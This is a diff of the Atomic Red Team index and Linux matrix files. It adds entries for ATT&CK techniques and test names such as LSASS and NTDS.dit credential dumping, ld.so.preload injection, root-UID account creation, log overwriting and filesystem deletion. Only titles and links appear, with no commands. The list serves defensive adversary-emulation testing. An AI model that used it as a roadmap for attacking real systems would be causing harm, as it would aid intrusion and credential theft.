- T1209 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1154 Trap](./T1154/T1154.md)
- Atomic Test #1: Trap [macos, centos, ubuntu, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1100 Web Shell](./T1100/T1100.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md)
- Atomic Test #1: Persistence [windows]
- Atomic Test #2: Persistence Cleanup [windows]
@@ -159,6 +164,7 @@
- Atomic Test #5: Clear Bash history (truncate) [linux]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- T1116 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1223 Compiled HTML File](./T1223/T1223.md)
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
@@ -183,6 +189,7 @@
- Atomic Test #7: Disable OpenDNS Umbrella [macos]
- Atomic Test #8: Unload Sysmon Filter Driver [windows]
- Atomic Test #9: Disable Windows IIS HTTP Logging [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1107 File Deletion](./T1107/T1107.md)
@@ -197,6 +204,7 @@
- Atomic Test #9: Delete VSS - wmic [windows]
- Atomic Test #10: bcdedit [windows]
- Atomic Test #11: wbadmin [windows]
- Atomic Test #12: Delete Filesystem - Linux [linux, centos, ubuntu]
- [T1222 File Permissions Modification](./T1222/T1222.md)
- Atomic Test #1: Take ownership using takeown utility [windows]
- Atomic Test #2: Take ownership recursively using takeown utility [windows]
@@ -213,9 +221,11 @@
- Atomic Test #13: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #14: chown - Change file or folder mode ownership only [macos, linux]
- Atomic Test #15: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #16: chattr - Remove immutable file attribute [macos, linux]
- T1006 File System Logical Offsets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1144 Gatekeeper Bypass](./T1144/T1144.md)
- Atomic Test #1: Gatekeeper Bypass [macos]
- T1484 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1148 HISTCONTROL](./T1148/T1148.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
@@ -244,6 +254,8 @@
- Atomic Test #1: Clear Logs [windows]
- Atomic Test #2: FSUtil [windows]
- Atomic Test #3: rm -rf [macos, linux]
- Atomic Test #4: Overwrite Linux Mail Spool [linux]
- Atomic Test #5: Overwrite Linux Log [linux]
- [T1202 Indirect Command Execution](./T1202/T1202.md)
- Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
- Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
@@ -279,6 +291,8 @@
- [T1055 Process Injection](./T1055/T1055.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: Process Injection via PowerSploit [windows]
- Atomic Test #3: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #4: Process Injection via C# [windows]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1121 Regsvcs/Regasm](./T1121/T1121.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
@@ -311,9 +325,13 @@
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
- Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
- Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1220 XSL Script Processing](./T1220/T1220.md)
- Atomic Test #1: MSXSL Bypass using local files [windows]
@@ -364,6 +382,8 @@
- [T1055 Process Injection](./T1055/T1055.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: Process Injection via PowerSploit [windows]
- Atomic Test #3: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #4: Process Injection via C# [windows]
- T1178 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053 Scheduled Task](./T1053/T1053.md)
- Atomic Test #1: At.exe Scheduled task [windows]
@@ -383,7 +403,8 @@
- Atomic Test #1: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #2: Disable tty_tickets for sudo caching [macos, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1100 Web Shell](./T1100/T1100.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
# discovery
- [T1087 Account Discovery](./T1087/T1087.md)
@@ -402,6 +423,7 @@
- [T1217 Browser Bookmark Discovery](./T1217/T1217.md)
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on Linux [linux]
- Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
- T1482 Domain Trust Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1083 File and Directory Discovery](./T1083/T1083.md)
- Atomic Test #1: File and Directory Discovery [windows]
- Atomic Test #2: File and Directory Discovery [windows]
@@ -448,6 +470,8 @@
- Atomic Test #1: System Information Discovery [windows]
- Atomic Test #2: System Information Discovery [linux, macos]
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #4: Linux VM Check via Hardware [linux]
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
- [T1016 System Network Configuration Discovery](./T1016/T1016.md)
- Atomic Test #1: System Network Configuration Discovery [windows]
- Atomic Test #2: System Network Configuration Discovery [macos, linux]
@@ -464,6 +488,7 @@
- [T1124 System Time Discovery](./T1124/T1124.md)
- Atomic Test #1: System Time Discovery [windows]
- Atomic Test #2: System Time Discovery - PowerShell [windows]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# credential-access
- [T1098 Account Manipulation](./T1098/T1098.md)
@@ -481,6 +506,8 @@
- Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows]
- Atomic Test #7: Offline Credential Theft With Mimikatz [windows]
- Atomic Test #8: Dump Active Directory Database with NTDSUtil [windows]
- Atomic Test #9: Create Volume Shadow Copy with NTDS.dit [windows]
- Atomic Test #10: Copy NTDS.dit from Volume Shadow Copy [windows]
- [T1081 Credentials in Files](./T1081/T1081.md)
- Atomic Test #1: Browser and System credentials [macos]
- Atomic Test #2: Extract credentials from files [macos, linux]
@@ -495,11 +522,11 @@
- [T1056 Input Capture](./T1056/T1056.md)
- Atomic Test #1: Input Capture [windows]
- [T1141 Input Prompt](./T1141/T1141.md)
- Atomic Test #1: Prompt User for Password [macos]
- Atomic Test #1: PowerShell - Prompt User for Password [windows]
- T1208 Kerberoasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1142 Keychain](./T1142/T1142.md)
- Atomic Test #1: Keychain [macos]
- T1171 LLMNR/NBT-NS Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1171 LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1040 Network Sniffing](./T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux [linux]
- Atomic Test #2: Packet Capture MacOS [macos]
@@ -539,8 +566,9 @@
- [T1152 Launchctl](./T1152/T1152.md)
- Atomic Test #1: Launchctl [macos]
- [T1168 Local Job Scheduling](./T1168/T1168.md)
- Atomic Test #1: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux]
- Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux]
- [T1170 Mshta](./T1170/T1170.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- [T1086 PowerShell](./T1086/T1086.md)
@@ -550,11 +578,12 @@
- Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows]
- Atomic Test #5: Invoke-AppPathBypass [windows]
- Atomic Test #6: PowerShell Add User [windows]
- Atomic Test #7: Powershell MsXml COM object [windows]
- Atomic Test #8: Powershell XML requests [windows]
- Atomic Test #9: Powershell invoke mshta.exe download [windows]
- Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- Atomic Test #11: PowerShell Fileless Script Execution [windows]
- Atomic Test #7: Powershell MsXml COM object - no prompt [windows]
- Atomic Test #8: Powershell MsXml COM object - with prompt [windows]
- Atomic Test #9: Powershell XML requests [windows]
- Atomic Test #10: Powershell invoke mshta.exe download [windows]
- Atomic Test #11: Powershell Invoke-DownloadCradle [windows]
- Atomic Test #12: PowerShell Fileless Script Execution [windows]
- [T1121 Regsvcs/Regasm](./T1121/T1121.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvs Uninstall Method Call Test [windows]
@@ -628,6 +657,8 @@
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1184 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -655,12 +686,14 @@
- Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- Atomic Test #2: PowerShell [windows]
- [T1074 Data Staged](./T1074/T1074.md)
- Atomic Test #1: Stage data from Discovery.bat [windows]
- Atomic Test #1: Stage data from Discovery.sh [linux, macos]
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1005 Data from Local System](./T1005/T1005.md)
- Atomic Test #1: Search macOS Safari Cookies [macos]
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1114 Email Collection](./T1114/T1114.md)
- Atomic Test #1: T1114 Email Collection with PowerShell [windows]
- [T1056 Input Capture](./T1056/T1056.md)
- Atomic Test #1: Input Capture [windows]
- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -680,13 +713,17 @@
- Atomic Test #4: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #5: Data Compressed - nix - tar Folder or File [linux, macos]
- [T1022 Data Encrypted](./T1022/T1022.md)
- Atomic Test #1: Data Encrypted [macos, centos, ubuntu, linux]
- Atomic Test #1: Data Encrypted with zip and gpg [macos, centos, ubuntu, linux]
- Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- [T1030 Data Transfer Size Limits](./T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, centos, ubuntu, linux]
- [T1048 Exfiltration Over Alternative Protocol](./T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, centos, ubuntu, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, centos, ubuntu, linux]
- Atomic Test #3: Exfiltration Over Alternative Protocol - HTTP [macos, centos, ubuntu, linux]
- Atomic Test #4: Exfiltration Over Alternative Protocol - ICMP [windows]
- T1041 Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -703,6 +740,7 @@
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1172 Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1483 Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1188 Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -717,7 +755,11 @@
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- [T1071 Standard Application Layer Protocol](./T1071/T1071.md)
- Atomic Test #1: Malicious User Agents [windows]
- Atomic Test #2: Malicious User Agents - Nix [linux, macos]
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1065 Uncommonly Used Port](./T1065/T1065.md)
@@ -725,9 +767,29 @@
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# impact
- T1485 Data Destruction [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1487 Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1489 Service Stop](./T1489/T1489.md)
- Atomic Test #1: Windows - Stop service using Service Controller [windows]
- Atomic Test #2: Windows - Stop service using net.exe [windows]
- Atomic Test #3: Windows - Stop service by killing process [windows]
- T1492 Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# initial-access
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1193 Spearphishing Attachment](./T1193/T1193.md)
atomics/index.yaml
+8322 -6608
View File
File diff suppressed because it is too large Load Diff
atomics/linux-index.md
+41 -9
View File
@@ -10,6 +10,7 @@
- Atomic Test #3: Firefox [linux, windows, macos]
- [T1136 Create Account](./T1136/T1136.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux]
- [T1158 Hidden Files and Directories](./T1158/T1158.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #3: Hidden file [macos, linux]
@@ -17,18 +18,20 @@
- Atomic Test #10: Create hidden directories and files [macos, linux]
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1168 Local Job Scheduling](./T1168/T1168.md)
- Atomic Test #1: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux]
- Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux]
- T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1166 Setuid and Setgid](./T1166/T1166.md)
- Atomic Test #1: Setuid and Setgid [macos, centos, ubuntu, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, centos, ubuntu, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, centos, ubuntu, linux]
- T1501 Systemd Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1154 Trap](./T1154/T1154.md)
- Atomic Test #1: Trap [macos, centos, ubuntu, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1100 Web Shell](./T1100/T1100.md)
# discovery
- [T1087 Account Discovery](./T1087/T1087.md)
@@ -62,6 +65,8 @@
- [T1082 System Information Discovery](./T1082/T1082.md)
- Atomic Test #2: System Information Discovery [linux, macos]
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #4: Linux VM Check via Hardware [linux]
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
- [T1016 System Network Configuration Discovery](./T1016/T1016.md)
- Atomic Test #2: System Network Configuration Discovery [macos, linux]
- [T1049 System Network Connections Discovery](./T1049/T1049.md)
@@ -88,8 +93,9 @@
- [T1119 Automated Collection](./T1119/T1119.md)
- [T1115 Clipboard Data](./T1115/T1115.md)
- [T1074 Data Staged](./T1074/T1074.md)
- Atomic Test #1: Stage data from Discovery.sh [linux, macos]
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1005 Data from Local System](./T1005/T1005.md)
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056 Input Capture](./T1056/T1056.md)
@@ -104,7 +110,7 @@
- Atomic Test #4: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #5: Data Compressed - nix - tar Folder or File [linux, macos]
- [T1022 Data Encrypted](./T1022/T1022.md)
- Atomic Test #1: Data Encrypted [macos, centos, ubuntu, linux]
- Atomic Test #1: Data Encrypted with zip and gpg [macos, centos, ubuntu, linux]
- [T1030 Data Transfer Size Limits](./T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, centos, ubuntu, linux]
- [T1048 Exfiltration Over Alternative Protocol](./T1048/T1048.md)
@@ -143,16 +149,19 @@
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #5: Clear Bash history (truncate) [linux]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1089 Disabling Security Tools](./T1089/T1089.md)
- Atomic Test #1: Disable iptables firewall [linux]
- Atomic Test #2: Disable syslog [linux]
- Atomic Test #3: Disable Cb Response [linux]
- Atomic Test #4: Disable SELinux [linux]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1107 File Deletion](./T1107/T1107.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
- Atomic Test #12: Delete Filesystem - Linux [linux, centos, ubuntu]
- [T1222 File Permissions Modification](./T1222/T1222.md)
- Atomic Test #8: chmod - Change file or folder mode (numeric mode) [macos, linux]
- Atomic Test #9: chmod - Change file or folder mode (symbolic mode) [macos, linux]
@@ -162,6 +171,7 @@
- Atomic Test #13: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #14: chown - Change file or folder mode ownership only [macos, linux]
- Atomic Test #15: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #16: chattr - Remove immutable file attribute [macos, linux]
- [T1148 HISTCONTROL](./T1148/T1148.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
@@ -173,6 +183,8 @@
- T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070 Indicator Removal on Host](./T1070/T1070.md)
- Atomic Test #3: rm -rf [macos, linux]
- Atomic Test #4: Overwrite Linux Mail Spool [linux]
- Atomic Test #5: Overwrite Linux Log [linux]
- [T1130 Install Root Certificate](./T1130/T1130.md)
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- [T1036 Masquerading](./T1036/T1036.md)
@@ -181,6 +193,7 @@
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055 Process Injection](./T1055/T1055.md)
- Atomic Test #3: Shared Library Injection via /etc/ld.so.preload [linux]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1014 Rootkit](./T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
@@ -202,8 +215,9 @@
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1168 Local Job Scheduling](./T1168/T1168.md)
- Atomic Test #1: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron Job [macos, centos, ubuntu, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, centos, ubuntu, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, centos, ubuntu, linux]
- Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux]
- [T1064 Scripting](./T1064/T1064.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- [T1153 Source](./T1153/T1153.md)
@@ -226,6 +240,7 @@
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1172 Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1483 Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1188 Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -240,13 +255,29 @@
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071 Standard Application Layer Protocol](./T1071/T1071.md)
- Atomic Test #2: Malicious User Agents - Nix [linux, macos]
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1065 Uncommonly Used Port](./T1065/T1065.md)
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# impact
- T1485 Data Destruction [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1487 Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1492 Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# initial-access
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -261,6 +292,7 @@
# privilege-escalation
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055 Process Injection](./T1055/T1055.md)
- Atomic Test #3: Shared Library Injection via /etc/ld.so.preload [linux]
- [T1166 Setuid and Setgid](./T1166/T1166.md)
- Atomic Test #1: Setuid and Setgid [macos, centos, ubuntu, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, centos, ubuntu, linux]
@@ -271,5 +303,5 @@
- Atomic Test #1: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #2: Disable tty_tickets for sudo caching [macos, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1100 Web Shell](./T1100/T1100.md)
atomics/linux-matrix.md
+21 -19
View File
@@ -3,23 +3,25 @@
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | [.bash_profile and .bashrc](./T1156/T1156.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Bash History](./T1139/T1139.md) | [Account Discovery](./T1087/T1087.md) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](./T1055/T1055.md) | [Clear Command History](./T1146/T1146.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | [Setuid and Setgid](./T1166/T1166.md) | [Disabling Security Tools](./T1089/T1089.md) | [Credential Dumping](./T1003/T1003.md) | [File and Directory Discovery](./T1083/T1083.md) | [Remote File Copy](./T1105/T1105.md) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) |
